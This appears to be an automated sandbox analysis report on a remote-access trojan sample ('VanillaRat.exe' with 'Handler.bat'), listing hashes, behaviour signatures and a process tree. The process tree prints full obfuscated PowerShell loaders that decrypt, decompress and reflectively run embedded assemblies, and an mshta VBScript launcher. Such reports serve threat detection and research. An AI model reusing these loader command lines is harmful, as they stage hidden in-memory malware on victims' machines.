Overview

overview

10

Static

static

10

Release/Ha...er.bat

windows7-x64

7

Release/Ha...er.bat

windows10-1703-x64

10

Release/Ha...er.bat

windows10-2004-x64

10

Release/Ha...er.bat

windows11-21h2-x64

10

Release/Va...at.exe

windows7-x64

8

Release/Va...at.exe

windows10-1703-x64

10

Release/Va...at.exe

windows10-2004-x64

10

Release/Va...at.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    60s
  • max time network
    21s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    18-08-2024 13:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Release/VanillaRat.exe

  • Size

    1.7MB

  • MD5

    59fea74c326c7e496617bb45bdfbcc00

  • SHA1

    7c0dd54592857eed1cb068e24315b2bbe7511b76

  • SHA256

    9b6dcbe8df1be5241a40987a416e896737a7442db492e9df8413277835fb766d

  • SHA512

    443005543a476b0c3ef4744ba0b7075185cf0ae80783c06f98ee2845872c54ad2ee6d69810acaed692720b5ad19129935b751e45ac8725b050ccca5b94ecc6ba

  • SSDEEP

    24576:Lz2qwZHZd2PjnRh3Xz2DrtasSA7ZUNnbkAqE6joUZ57W:f2qw+nYVZY6jog

Score
10/10
defense_evasionexecution

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:564
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{05f2ac45-92e4-4f14-8881-ace328a0574e}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:656
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{e501f1c1-975e-43a2-8573-35497546766a}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1600
    • C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
      "C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4640
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
            "Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4588
            • C:\Windows\SysWOW64\dllhost.exe
              C:\Windows\SysWOW64\dllhost.exe /Processid:{d36bbe4c-8175-4128-847f-69464971dbfa}
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1632
            • C:\Windows\SysWOW64\dllhost.exe
              C:\Windows\SysWOW64\dllhost.exe /Processid:{28beff50-36c5-4596-8c14-43feb29a3939}
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3872
    • C:\Windows\$sxr-mshta.exe
      C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\$sxr-cmd.exe
        "C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1868
        • C:\Windows\$sxr-powershell.exe
          C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
          3⤵
          • Executes dropped EXE
          • Hide Artifacts: Hidden Window
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3928

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
      Filesize

      435KB

      MD5

      f7722b62b4014e0c50adfa9d60cafa1c

      SHA1

      f31c17e0453f27be85730e316840f11522ddec3e

      SHA256

      ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

      SHA512

      7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izbbwn40.3f3.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Windows\$sxr-cmd.exe
      Filesize

      265KB

      MD5

      94912c1d73ade68f2486ed4d8ea82de6

      SHA1

      524ab0a40594d2b5f620f542e87a45472979a416

      SHA256

      9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9

      SHA512

      f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

      Download Submit

    • C:\Windows\$sxr-mshta.exe
      Filesize

      14KB

      MD5

      98447a7f26ee9dac6b806924d6e21c90

      SHA1

      a67909346a56289b7087821437efcaa51da3b083

      SHA256

      c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

      SHA512

      c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

      Download Submit

    • memory/656-102-0x0000000140000000-0x0000000140004000-memory.dmp

      Filesize

      16KB

      Download

    • memory/656-103-0x0000000140000000-0x0000000140004000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1468-3-0x0000019E5B6D0000-0x0000019E5B7B0000-memory.dmp

      Filesize

      896KB

      Download

    • memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1468-5-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1468-4-0x0000019E5BA60000-0x0000019E5BC04000-memory.dmp

      Filesize

      1.6MB

      Download

    • memory/1468-63-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1468-2-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1468-0-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1468-1-0x0000019E40000000-0x0000019E401BE000-memory.dmp

      Filesize

      1.7MB

      Download

    • memory/1468-58-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1632-106-0x0000000000400000-0x0000000000406000-memory.dmp

      Filesize

      24KB

      Download

    • memory/1632-105-0x0000000000400000-0x0000000000406000-memory.dmp

      Filesize

      24KB

      Download

    • memory/3928-165-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp

      Filesize

      696KB

      Download

    • memory/3928-164-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp

      Filesize

      1.9MB

      Download

    • memory/4588-101-0x0000029F19160000-0x0000029F1916A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4588-68-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp

      Filesize

      1.9MB

      Download

    • memory/4588-71-0x0000029F182F0000-0x0000029F18D40000-memory.dmp

      Filesize

      10.3MB

      Download

    • memory/4588-73-0x0000029F18D40000-0x0000029F18DE6000-memory.dmp

      Filesize

      664KB

      Download

    • memory/4588-88-0x0000029F18DF0000-0x0000029F18E46000-memory.dmp

      Filesize

      344KB

      Download

    • memory/4588-89-0x0000029F18E50000-0x0000029F18EA8000-memory.dmp

      Filesize

      352KB

      Download

    • memory/4588-90-0x0000029F18EB0000-0x0000029F18ED2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4588-93-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp

      Filesize

      1.9MB

      Download

    • memory/4588-69-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp

      Filesize

      696KB

      Download

    • memory/4588-170-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp

      Filesize

      1.9MB

      Download

    • memory/4588-65-0x0000029F18000000-0x0000029F18024000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4588-171-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp

      Filesize

      696KB

      Download

    • memory/4640-31-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4640-16-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4640-14-0x0000025B7AC30000-0x0000025B7ACA6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4640-15-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4640-11-0x0000025B7A940000-0x0000025B7A962000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4640-64-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4640-70-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

      Filesize

      9.9MB

      Download